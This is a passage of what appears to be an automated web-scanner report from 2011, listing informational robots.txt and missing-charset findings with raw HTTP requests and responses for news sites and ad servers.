Disallow: /registration/
Disallo
...[SNIP]...
24.130. http://www.stamfordadvocate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stamfordadvocate.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stamfordadvocate.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 20:19:03 GMT
ETag: "cd-5f5b5bc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:28:02 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.stamfordadvocate.com/sitemap.xml
Sitemap: http://www.stamfordadvocate.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=email
...[SNIP]...
24.131. http://www.thedailygreen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedailygreen.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 679
Content-Type: text/plain
Cache-Control: max-age=600
Date: Sat, 17 Sep 2011 16:26:50 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.132. http://www.timesunion.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timesunion.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timesunion.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 20:19:03 GMT
ETag: "c1-5f5b5bc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:28:17 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.timesunion.com/sitemap.xml
Sitemap: http://www.timesunion.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis
24.133. http://www.tribalfusion.com/optout/verify.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /optout/verify.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tribalfusion.com

Response

HTTP/1.1 200 OK
Etag: "5e1f9c-636-473b81bbfbe6f"
Accept-Ranges: bytes
Content-Length: 1590
Date: Sat, 17 Sep 2011 16:43:34 GMT
Connection: close
Last-Modified: Wed, 16 Sep 2009 20:54:43 GMT
Server: Apache/2.2.13 (Unix) PHP/5.3.0
Content-Type: text/plain
Keep-Alive: timeout=5, max=98

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.134. http://www.ugo.com/cm/ugo/css/ugo-global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /cm/ugo/css/ugo-global.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ugo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:01 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 20
Disallow: /admin/
Disallow: /ajax/
Disallow: /errorPages/
Disallow: /search/
Disallow: /shared/
Disallow: /sweepstakes/
Disallow: /syn/
Disallow: /takeover/
Disallow: /t
...[SNIP]...
24.135. http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube-nocookie.com
Path:   /v/IOje-N90P38&hl=en_US&fs=1&

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:44:57 GMT
Server: Apache
Last-Modified: Thu, 15 Sep 2011 00:40:25 GMT
ETag: "21b-4acf01f5a9040"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...
24.136. http://www.zvents.com/misc/widgets/20645.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /misc/widgets/20645.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.0 200 OK
Server: nginx/0.6.39
Date: Sat, 17 Sep 2011 16:23:18 GMT
Content-Type: text/plain; charset=utf-8
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 4
ETag: "8b580e35dacd6e1e6a353511cb096412"
Cache-Control: must-revalidate, private, max-age=0
Content-Length: 569
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYWQ0NTVmZWRkOTk2ODg2MjlkOGU3YWExODdlMGQzNDYiDWxvY2F0aW9uew0iCWNpdHkiElNhbiBGcmFuY2lzY28iC3JhZGl1c2lQIg1sYXRpdHVkZWYaMzcuNzY4MzAwMDAwMDAwMDA0AMInIhNkaXNwbGF5X3N0cmluZyIWU2FuIEZyYW5jaXNjbywgQ0EiDXRpbWV6b25lIg9VUy9QYWNpZmljIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy0xMjIuNDI0MDAwMDAwMDAwMDEAYEIiCnN0YXRlIgdDQQ%3D%3D--a42dfcd2604401d37ded5b2d71902311f5d999ba; path=/; expires=Sat, 17-Dec-2011 16:23:18 GMT; HttpOnly
X-Cache: MISS from squid1.admin.zvents.com
X-Cache-Lookup: MISS from squid1.admin.zvents.com:3128
Via: 1.0 squid1.admin.zvents.com (squid/3.1.4)
Proxy-Connection: keep-alive

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...
24.137. http://www2.glam.com/app/site/affiliate/nc/gs-optout.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.glam.com
Path:   /app/site/affiliate/nc/gs-optout.act

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www2.glam.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Jun 2009 18:04:04 GMT
ETag: "47a80b4-1a-46cf3b3120d00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 16:45:50 GMT
Connection: close

User-agent: *
Disallow: /
24.138. http://y.timesunion.com/b/ss/hearstalbanytu/1/H.21/s97295546184759  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://y.timesunion.com
Path:   /b/ss/hearstalbanytu/1/H.21/s97295546184759

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: y.timesunion.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:23 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "13d18d-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www375
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25. HTML does not specify charset  previous  next
There are 77 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

25.1. http://a.collective-media.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /

Request

GET / HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 93

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
25.2. http://a.collective-media.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Sat, 17 Sep 2011 16:27:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 93

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
25.3. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.3

Request

GET /adi/N1395.132636.7201864412421/B3640803.3;sz=300x250;ord=1316278115? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316296181487&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5313
Date: Sat, 17 Sep 2011 16:48:35 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
25.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278462? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100?t=1316296535517&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5279
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:54:22 GMT
Expires: Sat, 17 Sep 2011 16:54:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
25.5. http://ad.doubleclick.net/adi/N1558.NetMining/B4742075.6  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B4742075.6

Request

GET /adi/N1558.NetMining/B4742075.6;sz=728x90;ord=1316277729? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 480
Date: Sat, 17 Sep 2011 17:04:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b85/0/0/%2a/q;
...[SNIP]...
25.6. http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5019.284127.DBGVIDEONETWORK/B5621714

Request

GET /adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=3597907? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1519
Date: Sat, 17 Sep 2011 16:38:27 GMT

<!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/0/%2a/a%3B242752145%3B0-0%3B0%3B65464024%
...[SNIP]...
25.7. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6257.274732.SEATTLEPI-NNN/B5824230.2

Request

GET /adi/N6257.274732.SEATTLEPI-NNN/B5824230.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWxmM3Z2aihnaWQkMDM3N2Y2NDgtZTE0Yi0xMWUwLTk0OTItYjdjNWQwOTA3N2Y4LHN0JDEzMTYyNzczMTE4MTAwMzIsc2kkMjM2OTA1MSx2JDEuMCxhaWQkYUdxaVJFUzBxeWctLGN0JDI1LHlieCRPSjV4QU9jckNHZzNsUURkaWpJcG13LHIkMCkp/0/*;mtfIFrameRequest=false;ord=1316277311.859313? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1152
Date: Sat, 17 Sep 2011 16:53:07 GMT

<html><head><title>CLICK THIS</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional
...[SNIP]...
25.8. http://ad.doubleclick.net/adi/N6257.274732.SEATTLEPI-NNN/B5824230.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6257.274732.SEATTLEPI-NNN/B5824230.3

Request

GET /adi/N6257.274732.SEATTLEPI-NNN/B5824230.3;sz=728x90;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NW81dDdtayhnaWQkZmI0NmM3ODgtZTE0YS0xMWUwLThlNWItNTMyMTA0ZTljMGRjLHN0JDEzMTYyNzcyOTgwNjU4NjAsc2kkMjM2OTA1MSx2JDEuMCxhaWQkOFBGMVVrUzBxdXctLGN0JDI1LHlieCR2V3BLVkVtMjcySW8zVXc5RlFvc1R3LHIkMCkp/0/*;mtfIFrameRequest=false;ord=1316277298.128471? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1152
Date: Sat, 17 Sep 2011 16:35:07 GMT

<html><head><title>CLICK THIS</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional
...[SNIP]...
25.9. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.30

Request

GET /adi/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917123525%3Bdct=;ord=1316277325? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6091
Set-Cookie: id=c3c1d423c000085||t=1316278409|et=730|cs=002213fd4820a643dfe50be397; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:29 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:29 GMT
Date: Sat, 17 Sep 2011 16:53:29 GMT
Expires: Sat, 17 Sep 2011 16:53:29 GMT
Cache-Control: private

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 12:28:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
25.10. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.31  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.31

Request

GET /adi/N763.SpecificMedia.com/B5645537.31;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24537%3Bc=176942%3Bb=1044948%3Bts=20110917124135%3Bdct=;ord=1316277695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24537;c=176942;b=1044948;ts=20110917124135
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6037
Date: Sat, 17 Sep 2011 17:03:41 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Jun 28 15:03:57 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
25.11. http://ad.doubleclick.net/pfadx/seventeen_cim/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/seventeen_cim/

Request

GET /pfadx/seventeen_cim/;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;ac15=1;ic8=1;ac7=1;ac6=1;ac4=1;ic20=1;ic7=1;sz=24x24;dcmt=text/html;ord=1316294783714? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1596
DCLK_imp: v7;x;245645123;0-0;0;50217680;24/24;42962387/42980174/1;;~aopt=2/2/87/0;~okv=;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;ac15=1;ic8=1;ac7=1;ac6=1;ac4=1;ic20=1;ic7=1;sz=24x24;dcmt=text/html;~cs=n
Date: Sat, 17 Sep 2011 16:36:25 GMT

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;245645123;0-0;0;50217680;24/24;42962387/42980174/1;;~aopt=2/2/87/0;~okv=;secure=false;canopy_allowed=false;posit
...[SNIP]...
25.12. http://adreq.bizographics.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adreq.bizographics.com
Path:   /i

Request

GET /i?type=adreq&pid=454&aw=300&ah=250&sid=_default&url=http%3A%2F%2Fwww.seattlepi.com%2F&as=amp&ref=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php&rid=1316294717179 HTTP/1.1
Host: adreq.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:24:12 GMT
Expires: Sat, 17 Sep 2011 16:24:11 GMT
Last-Modified: Mon, 20 Dec 2010 18:45:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 158
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Empty</title></head><body><p></p></body></html>
25.13. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Request

GET /ag.asp?cc=ETN002.315724.0&source=iframe&ord=2088513037&clk=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlTQiwUs97GUoORfCML_fSCJZ25FnZW8sdXNhLHQsMTMxNjI3NjcxOTY5MCxjLDM3ODM3NCxwYyw5MDEyMCxhYywxOTY0NjIsbyxOMC1TMCxsLDcyOTAzCg--/clkurl= HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; FSQTS044=pctl=304960&pctm=1&fpt=0%2C304960%2C&pct%5Fdate=4267&FM39385=1&pctc=39385&FL304960=1&FQ=1; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 4185
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:37:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FSETN002=pctl=315724&pctm=2&FL315724=2&pctc=39594&FQ=2&fpt=0%2C315724%2C&pct%5Fdate=4277&FM39594=2; expires=Mon, 17-Oct-2011 16:38:20 GMT; domain=.adsfac.us; path=/
